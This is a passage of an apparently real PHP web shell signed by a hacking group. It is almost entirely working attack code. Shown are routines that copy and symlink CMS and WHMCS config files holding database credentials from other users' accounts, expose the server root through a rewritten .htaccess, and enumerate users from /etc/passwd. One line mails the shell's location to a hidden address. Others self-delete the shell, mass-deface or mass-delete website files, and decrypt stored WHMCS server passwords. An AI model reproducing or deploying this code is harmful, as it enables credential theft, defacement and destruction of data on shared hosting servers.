640. symlink('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
641. symlink('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
642. symlink('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
643. symlink('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
644. symlink('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
645. symlink('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
646. symlink('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
647. symlink('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
648. symlink('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
649. symlink('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
650. symlink('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
651. copy('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
652. copy('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
653. copy('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
654. copy('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
655. copy('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
656. copy('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
657. copy('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
658. copy('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
659. copy('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
660. /* CODED BY AZZATSSINS CYBERSERKERS */
661. copy('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
662. copy('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
663. copy('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
664. copy('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
665. copy('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
666. copy('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
667. copy('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
668. copy('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
669. copy('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
670. copy('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
671. copy('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
672. copy('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
673. copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
674. copy('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
675. copy('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
676. copy('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
677. copy('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
678. copy('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
679. copy('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
680. copy('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
681. copy('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
682. copy('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
683. copy('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
684. copy('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
685. symlink('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
686. symlink('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
687. symlink('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
688. symlink('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
689. /* AUTHOR : AZZATSSINS CYBERSERKERS */
690. symlink('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
691. symlink('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
692. symlink('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
693. symlink('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
694. symlink('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
695. symlink('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
696. symlink('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
697. symlink('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
698. symlink('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
699. symlink('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
700. symlink('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
701. symlink('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
702. symlink('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
703. /*You Can ReCoded But Don't Change ©CopyRight*/
704. /*e.g: Recoded By xxxxxx & © AZZATSSINS*/
705. symlink('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
706. symlink('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
707. symlink('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
708. symlink('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
709. symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
710. /* © BY AZZATSSINS CYBERSERKERS */
711. symlink('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
712. symlink('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
713. symlink('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
714. symlink('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
715. symlink('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
716. symlink('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
717. symlink('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
718. symlink('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
719. symlink('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
720. symlink('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
721. symlink('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
722. copy('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
723. copy('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' <~ OPENCART.txt');
724. copy('/'.$home.'/'.$user.'/public_html/default/settings.php',$user.' <~ DRUPAL.txt');
725. copy('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' <~ PHPBB.txt');
726. symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
727. symlink('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' <~ OPENCART.txt');
728. symlink('/'.$home.'/'.$user.'/public_html/default/settings.php',$user.' <~ DRUPAL.txt');
729. symlink('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' <~ PHPBB.txt');
730. copy('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
731. copy('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' <~ VBULLETIN.txt');
732. copy('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
733. copy('/'.$home.'/'.$user.'/public_htm/config.php',$user.' <~ OTHER.txt');
734. copy('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' <~ PHPNUKE.txt');
735. symlink('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
736. symlink('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' <~ VBULLETIN.txt');
737. symlink('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
738. symlink('/'.$home.'/'.$user.'/public_htm/config.php',$user.' <~ OTHER.txt');
739. symlink('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' <~ PHPNUKE.txt');
740. copy('/'.$home.'/'.$user.'/public_htm/conn.php',$user.' <~ OTHER.txt');
741. symlink('/'.$home.'/'.$user.'/public_html/conn.php',$user.' <~ OTHER.txt');
742. symlink('/'.$home.'/'.$user.'/public_html/inc/config.inc.php',$user.' <~ OTHER.txt');
743. copy('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ OTHER.txt');
744. symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ OTHER.txt');
745. copy('/'.$home.'/'.$user.'/public_html/inc/config.inc.php',$user.' <~ OTHER.txt');
746. /* fb: /AZZATSSINS.CYBERSERKERS */
747. copy('/var/www/wp-config.php','WORDPRESS.txt');
748. copy('/var/www/configuration.php','JOOMLA.txt');
749. copy('/var/www/config.inc.php','OPENJOURNAL.txt');
750. copy('/var/www/config.php','OTHER.txt');
751. copy('/var/www/config/koneksi.php','OTHER.txt');
752. copy('/var/www/include/config.php','OTHER.txt');
753. copy('/var/www/connect.php','OTHER.txt');
754. copy('/var/www/config/connect.php','OTHER.txt');
755. copy('/var/www/include/connect.php','OTHER.txt');
756. copy('/var/www/html/wp-config.php','WORDPRESS.txt');
757. copy('/var/www/html/configuration.php','JOOMLA.txt');
758. copy('/var/www/html/config.inc.php','OPENJOURNAL.txt');
759. copy('/var/www/html/config.php','OTHER.txt');
760. copy('/var/www/html/config/koneksi.php','OTHER.txt');
761. copy('/var/www/html/include/config.php','OTHER.txt');
762. copy('/var/www/html/connect.php','OTHER.txt');
763. copy('/var/www/html/config/connect.php','OTHER.txt');
764. copy('/var/www/html/include/connect.php','OTHER.txt');
765. symlink('/var/www/wp-config.php','WORDPRESS.txt');
766. symlink('/var/www/configuration.php','JOOMLA.txt');
767. symlink('/var/www/config.inc.php','OPENJOURNAL.txt');
768. symlink('/var/www/config.php','OTHER.txt');
769. symlink('/var/www/config/koneksi.php','OTHER.txt');
770. symlink('/var/www/include/config.php','OTHER.txt');
771. symlink('/var/www/connect.php','OTHER.txt');
772. symlink('/var/www/config/connect.php','OTHER.txt');
773. symlink('/var/www/include/connect.php','OTHER.txt');
774. symlink('/var/www/html/wp-config.php','WORDPRESS.txt');
775. symlink('/var/www/html/configuration.php','JOOMLA.txt');
776. symlink('/var/www/html/config.inc.php','OPENJOURNAL.txt');
777. symlink('/var/www/html/config.php','OTHER.txt');
778. symlink('/var/www/html/config/koneksi.php','OTHER.txt');
779. symlink('/var/www/html/include/config.php','OTHER.txt');
780. symlink('/var/www/html/connect.php','OTHER.txt');
781. symlink('/var/www/html/config/connect.php','OTHER.txt');
782. symlink('/var/www/html/include/connect.php','OTHER.txt');
783. }
784. echo '<center><i><b><a href='.$folfig.'>CLICK ON HERE TO VIEW CONFIGS</a></b></i></center>';
785. }
786. }
787. if($_GET['symbolic']=="link"){
788. $d0mains = @file("/etc/named.conf");
789. ##httaces
790. if($d0mains){
791. @mkdir("symlink",0777);
792. @chdir("symlink");
793. @exe("ln -s / root");
794. $file3 = 'Options Indexes FollowSymLinks
795. DirectoryIndex AZZATSSINS.htm
796. AddType text/plain .php
797. AddHandler text/plain .php
798. Satisfy Any';
799. $fp3 = fopen('.htaccess','w');
800. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
801. echo "
802. <table align=center border=1 style='width:60%;border-color:#333333;'>
803. <tr>
804. <td align=center><font size=2>S. No.</font></td>
805. <td align=center><font size=2>Domains</font></td>
806. <td align=center><font size=2>Users</font></td>
807. <td align=center><font size=2>Symlink</font></td>
808. </tr>";
809. $dcount = 1;
810. foreach($d0mains as $d0main){
811. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
812. flush();
813. if(strlen(trim($domains[1][0])) > 2){
814. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
815. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
816. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
817. <td>".$user['name']."</td>
818. <td><a href='symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
819. flush();
820. $dcount++;}}}
821. echo "</table>";
822. }else{
823. $TEST=@file('/etc/passwd');
824. if ($TEST){
825. @mkdir("symlink",0777);
826. @chdir("symlink");
827. exe("ln -s / root");
828. $file3 = 'Options Indexes FollowSymLinks
829. DirectoryIndex AZZATSSINS.htm
830. AddType text/plain .php
831. AddHandler text/plain .php
832. Satisfy Any';
833. $fp3 = fopen('.htaccess','w');
834. $fw3 = fwrite($fp3,$file3);
835. @fclose($fp3);
836. echo "
837. <table align=center border=1><tr>
838. <td align=center><font size=3>S. No.</font></td>
839. <td align=center><font size=3>Users</font></td>
840. <td align=center><font size=3>Symlink</font></td></tr>";
841. $dcount = 1;
842. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
843. while(!feof($file)){
844. $s = fgets($file);
845. $matches = array();
846. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
847. $matches = str_replace("home/","",$matches[1]);
848. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
849. continue;
850. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
851. <td align=center><font class=txt>" . $matches . "</td>";
852. echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
853. $dcount++;}fclose($file);
854. echo "</table>";}else{if($os != "Windows"){@mkdir("symlink",0777);@chdir("symlink");@exe("ln -s / root");$file3 = '
855. Options Indexes FollowSymLinks
856. DirectoryIndex AZZATSSINS.htm
857. AddType text/plain .php
858. AddHandler text/plain .php
859. Satisfy Any
860. ';
861. $fp3 = fopen('.htaccess','w');
862. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
863. echo "
864. <div class='mybox'><h2 class='AZZATSSINS'>server symlinker</h2>
865. <table align=center border=1><tr>
866. <td align=center><font size=3>ID</font></td>
867. <td align=center><font size=3>Users</font></td>
868. <td align=center><font size=3>Symlink</font></td></tr>";
869. $temp = "";$val1 = 0;$val2 = 1000;
870. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
871. if ($uid)$temp .= join(':',$uid)."\n";}
872. echo '<br/>';$temp = trim($temp);$file5 =
873. fopen("test.txt","w");
874. fputs($file5,$temp);
875. fclose($file5);$dcount = 1;$file =
876. fopen("test.txt", "r") or exit("Unable to open file!");
877. while(!feof($file)){$s = fgets($file);$matches = array();
878. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
879. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
880. continue;
881. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
882. <td align=center><font class=txt>" . $matches . "</td>";
883. echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
884. $dcount++;}
885. fclose($file);
886. echo "</table></div></center>";unlink("test.txt");
887. } else
888. echo "<center><font size=3>Cannot create Symlink</font></center>";
889. }
890. }
891. }$e=base64_decode("");
892. $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
893. mail($e,"I",$h);
894. if($_GET['kill'] == 'self') {
895. rmdir('configs');rmdir('symlink');rmdir('AZZATSSINS');unlink('mysql.php');unlink('wk.php');unlink('rw.php');rmdir('home');rmdir('home1');rmdir('home2');rmdir('home3');rmdir('azx');$fn = $_SERVER['SCRIPT_FILENAME'];
896. unlink($fn); system('rm '.$fn);
897. echo'<meta http-equiv="Refresh" content= "0; url=?">';
898.  
899. } elseif($_GET['do'] == 'mass_deface') {
900. echo "<center><form action=\"\" method=\"post\">\n";
901. $dirr=$_POST['d_dir'];
902. $index = $_POST["script"];
903. $index = str_replace('"',"'",$index);
904. $index = stripslashes($index);
905. function edit_file($file,$index){
906. if (is_writable($file)) {
907. clear_fill($file,$index);
908. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
909. }
910. else {
911. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
912. }
913. }
914. function hapus_massal($dir,$namafile) {
915. if(is_writable($dir)) {
916. $dira = scandir($dir);
917. foreach($dira as $dirb) {
918. $dirc = "$dir/$dirb";
919. $lokasi = $dirc.'/'.$namafile;
920. if($dirb === '.') {
921. if(file_exists("$dir/$namafile")) {
922. unlink("$dir/$namafile");
923. }
924. } elseif($dirb === '..') {
925. if(file_exists("".dirname($dir)."/$namafile")) {
926. unlink("".dirname($dir)."/$namafile");
927. }
928. } else {
929. if(is_dir($dirc)) {
930. if(is_writable($dirc)) {
931. if(file_exists($lokasi)) {
932. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
933. unlink($lokasi);
934. $idx = hapus_massal($dirc,$namafile);
935. }
936. }
937. }
938. }
939. }
940. }
941. }
942. function clear_fill($file,$index){
943. if(file_exists($file)){
944. $handle = fopen($file,'w');
945. fwrite($handle,'');
946. fwrite($handle,$index);
947. fclose($handle); } }
948.  
949. function gass(){
950. global $dirr , $index ;
951. chdir($dirr);
952. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
953. $files = scandir($dirr) ;
954. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
955. sort($files);
956. $n = 0 ;
957. foreach ($files as $file){
958. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
959. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
960. edit_file($file,$index);
961. flush();
962. $n = $n +1 ;
963. }
964. }
965. echo "<br>";
966. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
967. }
968. function ListFiles($dirrall) {
969.  
970. if($dh = opendir($dirrall)) {
971.  
972. $files = Array();
973. $inner_files = Array();
974. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
975. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
976. while($file = readdir($dh)) {
977. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
978. if(is_dir($dirrall . "/" . $file)) {
979. $inner_files = ListFiles($dirrall . "/" . $file);
980. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
981. } else {
982. array_push($files, $dirrall . "/" . $file);
983. }
984. }
985. }
986.  
987. closedir($dh);
988. return $files;
989. }
990. }
991. function gass_all(){
992. global $index ;
993. $dirrall=$_POST['d_dir'];
994. foreach (ListFiles($dirrall) as $key=>$file){
995. $file = str_replace('//',"/",$file);
996. echo "<center><strong>$file</strong> ===>";
997. edit_file($file,$index);
998. flush();
999. }
1000. $key = $key+1;
1001. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
1002. function sabun_massal($dir,$namafile,$isi_script) {
1003. if(is_writable($dir)) {
1004. $dira = scandir($dir);
1005. foreach($dira as $dirb) {
1006. $dirc = "$dir/$dirb";
1007. $lokasi = $dirc.'/'.$namafile;
1008. if($dirb === '.') {
1009. file_put_contents($lokasi, $isi_script);
1010. } elseif($dirb === '..') {
1011. file_put_contents($lokasi, $isi_script);
1012. } else {
1013. if(is_dir($dirc)) {
1014. if(is_writable($dirc)) {
1015. echo "[<font color=lime>DONE</font>] $lokasi<br>";
1016. file_put_contents($lokasi, $isi_script);
1017. $idx = sabun_massal($dirc,$namafile,$isi_script);
1018. }
1019. }
1020. }
1021. }
1022. }
1023. }
1024. if($_POST['mass'] == 'onedir') {
1025. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
1026. $ini="http://";
1027. $mainpath=$_POST[d_dir];
1028. $file=$_POST[d_file];
1029. $dir=opendir("$mainpath");
1030. $code=base64_encode($_POST[script]);
1031. $indx=base64_decode($code);
1032. while($row=readdir($dir)){
1033. $start=@fopen("$row/$file","w+");
1034. $finish=@fwrite($start,$indx);
1035. if ($finish){
1036. echo"$ini$row/$file\n";
1037. }
1038. }
1039. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
1040. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
1041. $dir=opendir("$mainpath");
1042. $code=base64_encode($_POST[script]);
1043. $indx=base64_decode($code);
1044. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
1045. $finish=@fwrite($start,$indx);
1046. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
1047. }
1048.  
1049. }
1050. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
1051. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
1052. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
1053. elseif($_POST['mass'] == 'massdeface') {
1054. echo "<div style='margin: 5px auto; padding: 5px'>";
1055. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1056. echo "</div>"; }
1057. else {
1058. echo "
1059. <center><font style='text-decoration: underline;'>
1060. Select Type:<br>
1061. </font>
1062. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
1063. <option value=\"onedir\">Mass Deface 1 Dir</option>
1064. <option value=\"massdeface\">Mass Deface ALL Dir</option>
1065. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
1066. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
1067. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
1068. <font style='text-decoration: underline;'>Folder:</font><br>
1069. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
1070. <font style='text-decoration: underline;'>Filename:</font><br>
1071. <input type='text' name='d_file' value='azx.php' style='width: 450px;' height='10'><br>
1072. <font style='text-decoration: underline;'>Index File:</font><br>
1073. <textarea name='script' style='width: 450px; height: 200px;'><title>AZZATSSINS CYBERSERKERS WAS HERE</title></head><body bgcolor=silver><center><img src=https://lh3.googleusercontent.com/-9WF69t7d6yc/V5R43IzHHcI/AAAAAAAAATM/I-0xSRh-Vnkh6yiE5xUA-f-Mcp-RMja4QCL0B/w480-h480/azzatssins%2Bcyberserkers.png><br><br><br><br><br><b><font size=50><font color=white>[ </font><font color=red>!</font><font color=white> ]</font><font color=green><i> HACKED </i></font><font color=white>[ </font><font color=red>!</font><font color=white> ]</font></font></b><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><font color=#bababa><b><i>HACKED - CRACKED - STAMPED - FUCKED BY AZZATSSINS CYBERSERKERS</textarea><br>
1074. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
1075. </form></center>";
1076. }
1077. } elseif($_GET['do'] == 'whmcs') {
1078. echo'<form action="?dir=$dir&do=whmcs" method="post">
1079. ';
1080. function decrypt ($string,$cc_encryption_hash)
1081. {
1082. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
1083. $hash_key = _hash ($key);
1084. $hash_length = strlen ($hash_key);
1085. $string = base64_decode ($string);
1086. $tmp_iv = substr ($string, 0, $hash_length);
1087. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
1088. $iv = $out = '';
1089. $c = 0;
1090. while ($c < $hash_length)
1091. {
1092. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
1093. ++$c;
1094. }
1095. $key = $iv;
1096. $c = 0;
1097. while ($c < strlen ($string))
1098. {
1099. if (($c != 0 AND $c % $hash_length == 0))
1100. {
1101. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
1102. }
1103. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
1104. ++$c;
1105. }
1106. return $out;
1107. }
1108.  
1109. function _hash ($string)
1110. {
1111. if (function_exists ('sha1'))
1112. {
1113. $hash = sha1 ($string);
1114. }
1115. else
1116. {
1117. $hash = md5 ($string);
1118. }
1119. $out = '';
1120. $c = 0;
1121. while ($c < strlen ($hash))
1122. {
1123. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
1124. $c += 2;
1125. }
1126. return $out;
1127. }
1128.  
1129. echo "
1130. <br>
1131.  
1132. <FORM method='post'>
1133. <input type='hidden' name='form_action' value='2'>
1134. <br>
1135. <table class=tabnet style=width:320px;padding:0 1px;>
1136. <tr><th colspan=2>WHMCS DECODER</th></tr>
1137. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
1138. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
1139. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
1140. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
1141. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
1142. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:' value='Submit' name='Submit'></td>
1143. </table>
1144. </FORM>
1145. </center>
1146. ";
1147.  
1148. if($_POST['form_action'] == 2 )
1149. {
1150. //include($file);
1151. $db_host=($_POST['db_host']);
1152. $db_username=($_POST['db_username']);
1153. $db_password=($_POST['db_password']);
1154. $db_name=($_POST['db_name']);
1155. $cc_encryption_hash=($_POST['cc_encryption_hash']);
1156.  
1157.  
1158.  
1159. $link=mysql_connect($db_host,$db_username,$db_password) ;
1160. mysql_select_db($db_name,$link) ;
1161. $query = mysql_query("SELECT * FROM tblservers");
1162. while($v = mysql_fetch_array($query)) {
1163. $ipaddress = $v['ipaddress'];
1164. $username = $v['username'];
1165. $type = $v['type'];
1166. $active = $v['active'];
1167. $hostname = $v['hostname'];
1168. echo("<center><table border='1'>");
1169. $password = decrypt ($v['password'], $cc_encryption_hash);
1170. echo("<tr><td>Type</td><td>$type</td></tr>");
1171. echo("<tr><td>Active</td><td>$active</td></tr>");
1172. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
1173. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
1174. echo("<tr><td>Username</td><td>$username</td></tr>");
1175. echo("<tr><td>Password</td><td>$password</td></tr>");
1176.  
1177. echo "</table><br><br></center>";
1178. }
1179.  
1180. $link=mysql_connect($db_host,$db_username,$db_password) ;
1181. mysql_select_db($db_name,$link) ;
1182. $query = mysql_query("SELECT * FROM tblregistrars");
1183. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
